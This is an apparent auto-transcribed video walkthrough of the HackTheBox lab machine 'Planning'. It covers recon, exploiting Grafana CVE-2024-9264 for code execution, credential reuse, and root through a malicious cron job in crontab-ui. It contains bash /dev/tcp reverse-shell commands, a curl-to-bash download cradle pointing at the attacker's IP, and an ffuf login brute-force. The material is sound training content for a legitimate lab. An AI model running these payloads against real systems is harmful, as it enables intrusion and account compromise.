HackTheBox - Planning

IppSec · Beginner ·☁️ DevOps & Cloud ·9mo ago

Key Takeaways

Discovers a vulnerable Grafana instance using gobuster and exploits it to gain remote code execution

Full Transcript

What's going on, YouTube? This is IPS doing planning from Hack the Box, which starts out discovering the homepage of this box isn't vulnerable to anything meaningful. But doing a virtual host scan, we can discover a subdomain that's hosting a outof-date version of Graphana that has a public exploit that leads to remote code execution. We can get into this box and discover that we're in a container. Looking at the environment variables, we discover a password that lets us SSH into the box. From here, we discover a kronabs.db file is within opt, which is a bit odd. Looking into it, it looks like it's part of the Chronab UI package which is listening on local host. Forwarding the port back to us and trying to access it, we discover it's protected with a username and password. Looking into the Chronabs DB file, we discover the password and then can brute force the username, which gets us into Kronab UI, which we can just get root by creating a malicious cronab. In the Beyond Route, we'll go over a little bit on some advanced um cases with FUF using encoders. So, with that being said, let's jump in. As always, we're going to start off with an end map. So, - sc for default scripts, sv enumerate versions, -v vvv for double verb boost. This gives us things like the ttl oa output off for mask in the end map directory and call it planning and then the IP address of 10101.68. This can take some time to run, so I've already ran it. Looking at the results, we see just two ports open. The first one being SSH on port 22, and the server is an Iuntu server. We also see HTTP on port 80 and its banner tells us it's engine X also running on Ubuntu and it's directing us over to planning.htb. So I'm going to go ahead and add this to my host file real quick. So pseudov etsy host and then we can say 101011.68 planning.htb. Save that. And let's go take a look at what the page is. So I'm going to go over to my browser http planning.htb and we get a page. So the first thing I want to do is try to enumerate what type of page this is. If I just do a random 404 page, we get a engine X error message. So we can't pinpoint the framework. Um, if we look at the page source, the next thing I'm looking for is like WordPress, Drupal, things like that in the top. And I don't really see anything. Um, let's see. We do have some.phps. So we know this is going to be a PHP website. So we could do a Go Buster with the extension PHP. and then find potential files. We could do a virtual host scan. Um, we see a field here. I'm going to do a virtual host scan first. Uh, but I'd probably set up multiple of these if I was doing it on my own. But let's just do a go buster. And then we'll do um directory. Oh, no. Vhost word list op seclist um DNS or is it discovery DNS? Discovery DNS. And then I don't like this next step, but I normally use one of these subdomains, top 1 million. The name we're looking for is only in this one. Um, in hindsight, probably should have made the subdomain a bit easier to find, but it's the name of a popular software thing. So maybe Bitquir is a subdomain list we should be using, but it's one of my biggest gripes about this box. Uh, we can do - http and then planning.htb. And let's just make sure this starts off. And then while that goes, let's go ahead and play with this field, right? We have a courses and a keyword. So if I do test and then search, we get nothing. There is something here, the courses page. It says check out new releases of our courses. So web design for beginners online marketing. I'm just going to uh I was hoping I could just copy that easily, but we'll just type web design. If we do web, we get nothing. Let's do web design for beginners. Get nothing. So, I'm going to think this field doesn't really do anything. We're just getting blank search results every time. Um, we could do like a uh single quote to see if we get an error message. I'm just going to send this over to Burpuite and play with this. And we do have the recon going on in the background. Um, has not found anything yet. Let's go ahead and um turn that off and on. And then let's do test search. And let's go back to Burpswuite for this. And let's see. I see 24112 bytes. So I'm just going to keep an eye on that. And that's how I'm going to know if the page changes, right? Because we're getting the whole index.php back. It's easy just to look at the size. So we put a single quote, it doesn't change, a double quote, it doesn't change. Um or one equals 1. doesn't change. So, I'm going to guess this is just um broken, right? I think percent is normally a wild card. So, we can try this um a e i o u. And this never really changes. So, I don't think we really have anything here. Um I'm just going to turn that off. Looking back at our results, we see it's only 12%. So, while that runs, I'm also going to run a tool called nuclei to see if it picks up anything we are missing. So, we can say nuclei um target http planning.htb and kick this off. And whenever I kick off multiple enumeration tools, I like keeping an eye on it at least at the start to make sure we're not getting timeouts. I bet if we ran a second go buster here, we may start seeing timeouts, which would be very bad because that means it's not fully testing a um item, right? So, while this goes, that looks like that's going fine. Uh we see that planning.htb looks fine. So, I'm just going to let these go and I'll come back if it finds anything. So, our virtual host enumeration is still going on, but Nuclea has finished. So let's go take a look at um what findings we have. Right. So the top here is just about SSH. We see the same banner we had in NMAP. Um SSH is letting us log in with um SSH keys or passwords. So this is also kind of good to know if we have a password, we may want to try it because it is accepting password authentication. Um the banner is engine X. And then for the actual web checks, we just have a bunch of missing headers. Right? If you just go report all these on a pen test or a bug bounty report, they'll probably start ignoring them just because they're used to seeing these. They don't exactly know how they're being exploited, right? It's the same way as if you use like um if the server is vulnerable to an SSL vulnerability like breach and you just use that um clickbait name, they'll be like, "Well, we've been vulnerable for years and never exploited, so why do we care?" Right? So, if I was going to report this, I would look for the ones that I can demonstrate most. Maybe the let's see um X-frame options may be easy to demonstrate because this is protecting against clickjacking attacks. So this if you have this set then the website won't be able to be displayed in an iframe. So maybe fishing, clickjacking, things like that, I may try demonstrating. It's probably the easiest because it just requires you standing up a resource on your own. Um, if the website is also listening on HTTP, I may highlight the um, strict transport security is missing because this would then allow users to man the middle of the website if they're on the same network, maybe at like a Starbucks or some other coffee shop or just places where they're on the same network. Not really that critical because most websites don't listen on HTTP nowadays. But if it is listing on HTTP and HTTPS, I may highlight that and then I can show a demo, right? um the content security policy. This would be a key one I normally add on if they have cross-sight scripting um on their website because all these headers are really a defense and depth methodology, right? So if you find cross-ite scripting, you can't really do that much with it, but you can demonstrate that if they use content security policy, then um the cross-ate scripting would be mitigated. Or even better, if you use cross-stage scripting, exploit something and then show content security policy would have prevented you from actually exploiting it, then this is a key one to um flag and can also like increase the severity or also get you a double bug bounty thing because you have a cross-ate scripting vulnerability and you also demonstrate the impact of content security policy. So technically you have two security relevant bugs, right? So um that's generally my approach to the security headers. really not that um big of a deal, but if you can show some type of exploitation, you may be able to um get them to take it seriously, right? So, let's go take a look at our virtual host. And we're at 95% and it has not found anything. So, I'm starting to think I did something wrong here. I'm just going to let this finish and get to 100. And I'm going to laugh if this is in like the position of 98,000 of the word I'm looking for. But maybe I just chose the wrong word list. And again, this is one of the things I really don't like about this box. I wish um we had on this page as um it gives you the credentials because it assume breach, but doesn't say the virtual host of the box. I wish we just put like these credentials go to the subdomain.planning.htb. Right. So, we have these credentials. We don't know exactly where they go. I'm hoping this virtual host finishes and it did not find it. So, I must have done something wrong. Uh, let's go. HTTP planning. That looks right. Um, looking at this warning message though, it says the first subdomain doesn't contain a dot. You might want to append the base domain, otherwise the vhost will be tried as is. Um, I'm going to add the dash debug flag real quick. Uh, I think GoBuster changed how it normally works. I swear in previous boxes if um it would just append the domain I put in the URL, but it doesn't look like it's doing that. Right. Based upon the error message, it said I need to use append domain. Let's try ad planning.htv. Okay, so I guess they have changed the syntax. my go buster updated. Um, when you use Go Buster to do virtual host scanning, um, you want to use the append domain to get it exactly how you want it. Um, odd behavior. Let's go ahead and run this again. And I'm going to pause the video and we'll resume when it is done. Hopefully this time it finds it. If not, then I'm going to be switching to fuff. And I probably won't be using Go Buster for um, DNS recon anymore because that is definitely odd. Okay. And there we go. That's much better. About 25% of the way through, we get graphana.planning.htb. So, um, gobbuster definitely did change that. And that's one of the good things about doing CTFs like hack the box, you know, things are vulnerable. I'm sure if I was doing just pen testing fulltime still, um, this change would happen and I would never really, uh, find out. I'd go through and miss a few virtual hosts just because, um, I don't know something is supposed to be vulnerable and I don't test my tool sets. um doing CTFs like hack the box or just training things is a great way just to make sure your tools are working as you expect them to. Right? So let's go ahead and um add this to our host file. So I'm going to do a pseudo vets host and then we can add the graphana.planning.htb. Save that and let's go um access it. Right? So we do http graphfana.planning.htb htb and we get graphana loaded and it tells us the version is 11.0.0 O right and also um the account is admin and this password so let's try um logging in here so I'm going to do admin and this and we get logged into graphana right um my first thing is always looking at like the change log so if we do um let's see graphana change log and see if we can find out how old this version is um release notes graphana documentation does this tell us uh this is the latest I'm guessing. Oh, wait. It looks like it will. Let's do 110. See, that doesn't work. Um, I'm going to go to 85011. And then we just change this to be 110. Oh, do we get a 404? We do. Wonder if we just do release notes 11. Um, let's see. Graphana 110 release notes. And if we don't find the exact time, I normally don't spend too long on it. I just look at like the latest version. Um, so it looks like maybe around May 19th, 2024. Um, another good one is just go to like CVE details. This is probably also where I'd start. Um, and then just type in the product. And we can see a bunch of vulnerabilities. I'm going to click on this just so we see them. And then let's go ahead and find one that looks juicy, right? Um 7.6 maybe. But I like normally looking for some type of red. We have this um SQL expressions experimental feature of Graphfana allows evaluation of duct DB queries. Um it doesn't tell us what version. Uh, we thought it like 11:00 was sometime in May 2024. So, this comes out definitely after it. Um, why am I blocked? Uh, let's see. Disable burpuite. Refresh. Okay. Um, websites can detect if you're using burpuite. I think it's based upon like the um I know it's not germ because I think germ is the fingerprint of the server but essentially it fingerprints the um encryption algorithms that you support and that's how it identifies kind of what browser or what SSL thing you are using and they probably have one for Burpsweet and they just think it's a bot. So um maybe it's like J4S signature or something. Um, I'm sure if you search around for JARM J A RM, you find it. But let's just go ahead and take a look at this. So, we have this CVE um, Graphana version 110. So, it looks like it will be vulnerable. I'm just going to do this and then search GitHub to see if we have any proof of concepts um, advisory. Looks like a potential PC. So, let's go here. It is loading the GitHub page and let's see PC demonstrates SQL read and um code execution can only happen on 11 but it looks like future versions may have a way to do file disclosure. Uh this is using version 11. So we should be able to get rce. So I'm going to do a get clone on this. Let's go in here. Uh Python 3 CVE. It uses the module 10. Let's just do a Python 3M VM.VM and we can do a source bin activate once this creates the virtual environment. Uh VM bin activate pip 3 install-r requirements.ext to start installing these. And while that goes let's see uh we want to use C. So we can do Python 3 user pass and then copy this. So let's do this. Uh this will be graphana planning htb. I'm just going to run the shell command ID to see if we have like um command reflection admin password. Let's go back to here. Make sure we grab this. Uh that paste was odd. I think that's fine. That looks it. Run it. And let's see. We have command execution, right? So since I'm putting this in um here, what I'm going to do actually is uh let's do shell.sh SH and we can say bash- C b- I dev TCP 1010 1048 90001 0 and 1. So if I try to put everything like my whole command and an argument sometimes it's a little bit wonky um as in like their special characters things like that. If I do this, I should be able to um just do a cat shell like this. And what this is going to do is um I don't know if that's actually going to work because this will create a Yeah, that's not um like that. That should work. Unrecognize argument. No. Um, put it in quotes. That's funny that it did ID. I guess it just worked for my last command. Um, we have an error message here. Syntax error bash. So, it doesn't like all those special characters. Um, so actually, let's do a make dubdubdub. And then we'll copy shell.sh. Uh, did I have it? Wait, what? Oh, shot is here. Um, go here. Dub dubdub. There we go. So, my command I'm just going to do a user bin curl http 10 1048 8000 shell.sh pipe over to bash like that. Python 3M http server and see if this works. It does. Um, and we get the shell there. I'm curious if I tried to do this. Uh, let's try if I didn't try to get fancy and put in a file to put in the thing, would it have worked? Let's just do this real quick. dev tcp 10 104 8 91 and one. Is this going to work? It does work. So, you can do it either way. Um, sometimes I just don't like putting the reverse shell payload in an argument because sometimes it is uh processed poorly. I thought I could just um like do it as a file and then make it a bit easier, but that doesn't work, right? Um and I'm sure if I did this also, it won't work. Yeah, because what that does, it just passes in the temporary location of it because what it's doing is running this command and then creating a fake file for it. Um, at the end of the video, I think I can show this. I'm actually surprised this didn't work, but um, yeah, I don't know. So, we do get a shell. Hopefully, I didn't just confuse you. Um, you can get a shell either way, right? I like doing the web cradle because there two reasons. Um curl is probably going to work on a box. So if you get a hit from the curl to your web server, you know the server can reach out to the internet and things are working fine, right? And then if it fails to give you the shell, then you know something's blocking it. Maybe some type of firewall or something is just blocking the reverse shell from working. If you try to put everything in one payload, like that whole bash command, you don't know if the uh firewall blocked you. You don't know if you have bad characters in your payload. It just introduces a lot of unknowns, right? So that's why I like just breaking up into multiple parts because if it fails, I know, oh, it failed at this part. What did we introduce between this and the code execution? Okay, that's where it errored at, right? So breaking into parts is very useful for troubleshooting, but it doesn't really matter since we showed both worked. So let's see we are definitely on a docker container based upon this host name right um if I do lsla on slash we do see the docker environment to look at what my environment looks like and we see um a password right here so riot tech and something um and the username is enzo so if we can't etsy pass wd um we don't really see the Enzo user because we're in the container. Um, I'm going to check if Enzo exists on the box, right? We did have Nuclear tell us passwords could log in and we have a password. So, let's do planning.htb accept that. Put in the password and we get logged into the box. Awesome. So, the first thing I always like doing is just checking the pseudo because I have the password for this Enzo user. I can't find any or I can't run anything with pseudo. So, let's do a find. And we have a user.ext. So, we could get the flag from here. Uh, there is a history file of less. And I think that may just be because I did not revert this box. Um, or not. Um, we do have the file just being empty. It's probably pointed to dev null. Um, nope. It's just empty. So, uh, that is a little bit odd, but let's see what else could we do. Uh we can do a PSF force to look at running processes on the box and we see um the hide PID is enabled. Right? If I cat Etsy fs tab we see um let's see where is it not there. Dev disk right here the proc system is mounted with hide p equals 2 which hides processes um running as other users. So we can only see um what our user has access to. So let's see. I like also looking at the ports open on the box. So, let's see. We have 80, which is the web server. We knew that there's a port 8,000 and 3000. Normally, I'd look at the PS output command and see if I can figure out what process is using what port, but we can't do that. So, I'm going to go to the Etsy directory, and we can do a gre capital R 8,000 to devnull. And we see nothing. Let's try 30,000. And we see graphana is in the engine x directory pointed there. Right? You could also just do curls. So if we do a curl- i um 127001 3000, this is going to show us the headers. Uh we find a 302 found it redirects us to /lo. Um if we remembered from our box, that's what Graphfana did, but we could follow it. So, if we just don't do that dash I um let's do sluggin. Uh we could probably find graphana there, right? We don't know what 8000 is. If I send 8000, we just get a unauthorized and it says express. So, we have a second web server here, right? And I know it's not using engine X because um I would have seen that in like the engine X config, right? When we did the GP for 3000, it found it in um sites enabled and this default there was a 3000 here, but nothing's passing us to 8,000. So let's go ver dubdubdubdub. Uh we have web. Uh we could let's see look at index.php. We do have credentials here. So root and then this um so we can say su can we log in because there is a database right g rep everything that ends in sh on etsy pass wd no other users um let's go back to this index uh localhost mysql- root-p put in that password and then let's See, show databases, use educate, show tables, select star from courses, it's empty, which isn't a surprise because when we're using that search functionality of the web page, um, it was all empty and doesn't really look like anything interesting there. So, let's see. Um, what else do we have? Another place that's common to run websites is the opt directory. And we have an opt cron tabs. So if I look at cron tabs, we do have a cron tab db. If I just cat this um we have some entries, right? Uh graphana backup user bin docka uh docker. Let's see. Maybe it's just easy if I copy this. V cron tabs.json because this looks like JSON data. Cat this jq dot. There we go. easier to view. So we can see two crrons running. We have cleanup.sh running and it looks like it runs every single minute. And then this docka one runs daily. Um we can't really run pace by to identify what cleanup.sh is doing because that hide pid equals 2 is on the box. So we can't like just see running processes. Um so that may make cleanup really hard to investigate. Uh, one thing I also like doing, if we go to Etsy, uh, systemd, we can list all the services on the box. So, I'm just going to do find-fs. And let's see, um, resolved D is this year. We also have this cron tab UI of February 28th. So, this is probably going to be related to that cron tab file, right? Um, we can't read this file, but I'm guessing inside of this file is going to be listened on port 8000, and it probably has some type of credentials or something, right? Uh, so let's see. If we look at this tab UI GitHub, we'll probably be able to find it's open source. And we could search this for um default configurations. Unfortunately, I don't think it has one for username and password, but this looks like it is probably the application and it passes things in an environment variable. So, let's go ahead and just forward this port back to us. So, oh, and looking at it, we do have a password here. Um, so in this command, we have password S0 riot 3C. If we try to su with it, does not look like it works. So, what I'm going to do is if the first thing on a line you type um is squiggly C, it should drop you in this interactive prompt. And I'm going to listen on port uh we'll do 801 because my web server is already listening on port 8000 and we're forward to 127001 8000. So anything on my box on port 800001 is going to forward it through that SSH connection and it's going to go to port 8000 on local host. So we can test that by doing 127001 801 and we get the same thing we saw with that curl um a login page right. So I'm going to try admin and then the password um enzo the password root the password and it lets us log in. So, we have access to this cron tab UI. Um, I'm going to click new for a new cron tab. And I'm going to say shell and the command I'll do um bash- c- i dev tcp 101048 90001 and one like that. Um, let's make sure we are listening on 9,0001. Save this. I'm going to click run now. Yes to run the crown. And did I typo something? B- c- i devtcp1010480. Okay, there we go. We have a shell. I guess it just took a second. So if I do cdroot, we can get root.ext. Um, one thing I don't like is manly trying a bunch of usernames for a login, right? And a lot of tools just do the um login brute force like Hydra makes this really easy. It's a pretty old tool, not really updated anymore, but I figured this is a good thing to um show the fuff in coders, right? Because we could do this ourself. Um and I think it's a good learning opportunity. So, let's just say uh we didn't know this password. Um how do I log out? Is there a log out? I guess we can go to uh cookies cache storage index local storage delete all delete session refresh um new private I don't have burpswuite here uh clear data history did you forget there There we go. Awesome. So, it's asking us to sign in again. So, I'm going to send this over to Burpswuite. Refresh. And we'll say IPSAC password. And let's make sure we are intercepting. Sign in. And we have the login form here. So, HTTP authentication, it does basic. And then this is B 64 encoded. We can see decoded. It puts the username colon the password. So, I'm going to do is copy this request to a file. And I'm going to call this login.request. And then we can edit this. And what I'm going to do is put fuff here because this going to be the piece um we want to edit, right? So, we can do a fuff request login. We want to say the protocol is HTTP because it defaults to HTTPS. And then the word list. Um, let's create a custom word list. So we do v um users.ext. We'll say IPSAC admin Enzo root please subscribe um encoders for the win. Sure, that's fine. So if we say users.ext and then I think that's all we need. Um, login. Let's see. Request request proto. I kind of expected to see lines. Um, let's see. Match all responses. Let's see. Match code. So, we can say MC all. Is that going to show me everything? Uh, status 401. I was kind of hoping. Is it fuzz? Okay. Fuzz, not fuff. There we go. Um, we see it attempting each one of these, right? So, what we have to do is part our username colon the password and B 64 encode it. So, I'm going to um use that thing we showed earlier in the video. So, I'm going to do this. And what this is going to do is create a temporary file. So, I'm going to do a said, and I'm going to search for a line break, which is a dollar sign. And then I'm going to replace it with colon. Not that. Um, let's go back. Uh, where is it? Uh, right here. Right. User.ext. So said search for line break and then replace it with colon and the password. Um, we saw that here, right? I was in op catron tab cron tab db. Okay. So we do this and end uh we need to specify the file users.ext. There we go. So what we have done is put a username colon the password for every line. Right? If you don't know exactly how this works, again, it runs this command, creates a temporary file. So when something reads that temporary file, um, it does that, right? I can kind of show that if we do echo this, it's dev file descriptor 63. So if I catted that file descriptor, we get the results, right? And my users.ext is still this. So what we want to do now is use the encoder. So we have um fuff has encoders. So we could like URL encode something. We can base 64 encode. We want a B 64 encode. So we'll doc and then we specify what our um replacement character is, right? And then login.reest replacement is fuzz. So I'm going to do encoder fuzz and then colon b 64 encode. So that's going to say is every word this is B 64 encoded after you do the word list replacement. And there we have it. We have this and we see 401 401 401200. So we could have also done a filter code 401. So it hides all that. And then we only get this as the result. And then if we echo this B 64 decode it, we get the username. So, that's how you could do a username brute force with FUF. It's probably much easier just to use Hydra. Um, but if you wanted to go the hard way and just use Fuff because you know Fuff well, that's how you could do it. So, um, hopefully I didn't really confuse you going, um, crazy and doing things this way. Um, yeah. So take care and I will see you all next

Original Description

00:00 - Introduction 01:00 - Start of nmap 02:40 - Using gobuster to discover the VHOST and running into a minor issue, I think gobuster changed how it handles the domain on VHOST Scans. 06:00 - Looking at the Nuclei Results 09:40 - Using the append-domain (ad) flag in gobuster to allow our VHOST scan to work and discovering the Grafana subdomain 12:00 - Discovering Grafana is running 11.0.0 and searching CVE's 13:40 - Finding CVE-2024-9264, and running it to get a shell on the Grafana docker container 21:00 - Looking at the env variables, discovering a credential that works to SSH into the box 25:50 - Looking at the crontab.db file, discovering a password 27:50 - Forwarding localhost:8000 back to us, so we can hit crontab-ui and logging in and creating a malicious cron to get root 29:35 - Showcasing FFUF to bruteforce HTTP Login by using bashful to append a string to our fuzz list and also use an encoder to b64 encode
Watch on YouTube ↗ (saves to browser)
Sign in to unlock AI tutor explanation · ⚡30

Playlist

Uploads from IppSec · IppSec · 0 of 60

← Previous Next →
1 HHC2016 - Analytics
HHC2016 - Analytics
IppSec
2 HackTheBox - October
HackTheBox - October
IppSec
3 HackTheBox - Arctic
HackTheBox - Arctic
IppSec
4 HackTheBox - Brainfuck
HackTheBox - Brainfuck
IppSec
5 HackTheBox - Bank
HackTheBox - Bank
IppSec
6 HackTheBox - Joker
HackTheBox - Joker
IppSec
7 HackTheBox - Lazy
HackTheBox - Lazy
IppSec
8 Camp CTF 2015 - Bitterman
Camp CTF 2015 - Bitterman
IppSec
9 HackTheBox - Devel
HackTheBox - Devel
IppSec
10 Reversing Malicious Office Document (Macro) Emotet(?)
Reversing Malicious Office Document (Macro) Emotet(?)
IppSec
11 HackTheBox - Granny and Grandpa
HackTheBox - Granny and Grandpa
IppSec
12 HackTheBox - Pivoting Update: Granny and Grandpa
HackTheBox - Pivoting Update: Granny and Grandpa
IppSec
13 HackTheBox - Optimum
HackTheBox - Optimum
IppSec
14 HackTheBox - Charon
HackTheBox - Charon
IppSec
15 HackTheBox - Sneaky
HackTheBox - Sneaky
IppSec
16 HackTheBox - Holiday
HackTheBox - Holiday
IppSec
17 HackTheBox - Europa
HackTheBox - Europa
IppSec
18 Introduction to tmux
Introduction to tmux
IppSec
19 HackTheBox - Blocky
HackTheBox - Blocky
IppSec
20 HackTheBox - Nineveh
HackTheBox - Nineveh
IppSec
21 HackTheBox - Jail
HackTheBox - Jail
IppSec
22 HackTheBox - Blue
HackTheBox - Blue
IppSec
23 HackTheBox - Calamity
HackTheBox - Calamity
IppSec
24 HackTheBox - Shrek
HackTheBox - Shrek
IppSec
25 HackTheBox - Mirai
HackTheBox - Mirai
IppSec
26 HackTheBox - Shocker
HackTheBox - Shocker
IppSec
27 HackTheBox - Mantis
HackTheBox - Mantis
IppSec
28 HackTheBox - Node
HackTheBox - Node
IppSec
29 HackTheBox - Kotarak
HackTheBox - Kotarak
IppSec
30 HackTheBox - Enterprise
HackTheBox - Enterprise
IppSec
31 HackTheBox - Sense
HackTheBox - Sense
IppSec
32 HackTheBox - Minion
HackTheBox - Minion
IppSec
33 VulnHub - Sokar
VulnHub - Sokar
IppSec
34 VulnHub - Pinkys Palace v2
VulnHub - Pinkys Palace v2
IppSec
35 HackTheBox - Inception
HackTheBox - Inception
IppSec
36 Vulnhub - Trollcave 1.2
Vulnhub - Trollcave 1.2
IppSec
37 HackTheBox - Ariekei
HackTheBox - Ariekei
IppSec
38 HackTheBox - Flux Capacitor
HackTheBox - Flux Capacitor
IppSec
39 HackTheBox - Jeeves
HackTheBox - Jeeves
IppSec
40 HackTheBox - Tally
HackTheBox - Tally
IppSec
41 HackTheBox - CrimeStoppers
HackTheBox - CrimeStoppers
IppSec
42 HackTheBox - Fulcrum
HackTheBox - Fulcrum
IppSec
43 HackTheBox - Chatterbox
HackTheBox - Chatterbox
IppSec
44 HackTheBox - Falafel
HackTheBox - Falafel
IppSec
45 How To Create Empire Modules
How To Create Empire Modules
IppSec
46 HackTheBox - Nightmare
HackTheBox - Nightmare
IppSec
47 HackTheBox - Nightmarev2  - Speed Run/Unintended Solutions
HackTheBox - Nightmarev2 - Speed Run/Unintended Solutions
IppSec
48 HackTheBox - Bart
HackTheBox - Bart
IppSec
49 HackTheBox -  Aragog
HackTheBox - Aragog
IppSec
50 HackTheBox - Valentine
HackTheBox - Valentine
IppSec
51 HackTheBox - Silo
HackTheBox - Silo
IppSec
52 HackTheBox - Rabbit
HackTheBox - Rabbit
IppSec
53 HackTheBox - Celestial
HackTheBox - Celestial
IppSec
54 HackTheBox - Stratosphere
HackTheBox - Stratosphere
IppSec
55 HackTheBox - Poison
HackTheBox - Poison
IppSec
56 HackTheBox - Canape
HackTheBox - Canape
IppSec
57 HackTheBox - Olympus
HackTheBox - Olympus
IppSec
58 HackTheBox - Sunday
HackTheBox - Sunday
IppSec
59 HackTheBox - Fighter
HackTheBox - Fighter
IppSec
60 HackTheBox - Bounty
HackTheBox - Bounty
IppSec

Related AI Lessons

Qwen 3.6 27B Is the Local Dev Sweet Spot — Here's Why
Discover why Qwen 3.6 27B is the ideal choice for local development, and how it can boost your productivity
Dev.to · Carter May
Deploying Spring Petclinic Microservices with Docker Compose: An End-to-End DevOps Deployment Experience
Learn to deploy Spring Petclinic microservices with Docker Compose for a seamless DevOps experience
Dev.to · Nice Nwogu
Qwen 3.6 27B Is the Local Dev Sweet Spot — Here's Why
Discover why Qwen 3.6 27B is the ideal choice for local development, offering a sweet spot for efficiency and performance
Dev.to · Carter May
Terraform Seems Annoying. But It’s Just Saving You.
Learn how Terraform's 'saved plan is stale' errors are actually a safety feature to prevent unintended changes to your infrastructure
Medium · DevOps

Chapters (11)

Introduction
1:00 Start of nmap
2:40 Using gobuster to discover the VHOST and running into a minor issue, I think g
6:00 Looking at the Nuclei Results
9:40 Using the append-domain (ad) flag in gobuster to allow our VHOST scan to work
12:00 Discovering Grafana is running 11.0.0 and searching CVE's
13:40 Finding CVE-2024-9264, and running it to get a shell on the Grafana docker con
21:00 Looking at the env variables, discovering a credential that works to SSH into
25:50 Looking at the crontab.db file, discovering a password
27:50 Forwarding localhost:8000 back to us, so we can hit crontab-ui and logging in
29:35 Showcasing FFUF to bruteforce HTTP Login by using bashful to append a string t
Up next
Containers on Amazon ECS with Mama J
AWS Developers
Watch →